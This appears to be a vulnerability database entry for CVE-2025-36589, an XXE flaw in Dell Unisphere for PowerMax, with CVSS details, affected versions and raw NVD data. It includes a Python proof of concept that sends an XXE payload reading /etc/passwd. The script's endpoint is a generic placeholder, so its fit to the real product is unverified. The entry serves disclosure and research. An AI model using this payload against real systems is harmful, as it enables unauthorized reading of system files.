Security Vulnerability Report
CVE-2025-36589 CVSS 7.6 HIGH

CVE-2025-36589

Published: 2026-01-06 17:15:44
Last Modified: 2026-01-22 20:44:15

Description

Dell Unisphere for PowerMax, version(s) 9.2.4.x, contain(s) an Improper Restriction of XML External Entity Reference vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access to data and resources outside of the intended sphere of control.

CVSS Details

CVSS Score: 7.6
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:dell:unisphere_for_powermax:9.2.4.18:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dell:unisphere_for_powermax_virtual_appliance:*:*:*:*:*:*:*:* - VULNERABLE
Dell Unisphere for PowerMax 9.2.4.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-36589 XXE PoC for Dell Unisphere for PowerMax
# Placeholder host and endpoint; replace with the authorized test target.
target_url = "https://<target>/api/v1/endpoint"

# XXE payload to read /etc/passwd
xxe_payload = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>'''

# The vulnerability is reachable with low privileges, so a low-privilege token suffices.
headers = {
    "Content-Type": "application/xml",
    "Authorization": "Bearer <low_privilege_token>"
}

try:
    response = requests.post(target_url, data=xxe_payload, headers=headers, timeout=10)
    print(f"Status: {response.status_code}")
    print(f"Response: {response.text}")
except requests.exceptions.RequestException as e:
    print(f"Error: {e}")
```

References

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-36589", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:43.780", "lastModified": "2026-01-22T20:44:14.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Unisphere for PowerMax, version(s) 9.2.4.x, contain(s) an Improper Restriction of XML External Entity Reference vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access to data and resources outside of the intended sphere of control."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-611"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:unisphere_for_powermax:9.2.4.18:*:*:*:*:*:*:*", "matchCriteriaId": "91E090BB-DB5B-428A-86E5-CD435AEF6360"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dell:unisphere_for_powermax_virtual_appliance:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.2.4.17", "versionEndExcluding": "9.2.4.19", "matchCriteriaId": "51C6E69D-6294-4181-BF67-CEE8075371FA"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000402262/dsa-2025-425-dell-powermaxos-dell-powermax-eem-dell-unisphere-for-powermax-dell-unisphere-for-powermax-virtual-appliance-dell-unisphere-360-dell-solutions-enabler-virtual-appliance-security-update-for-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```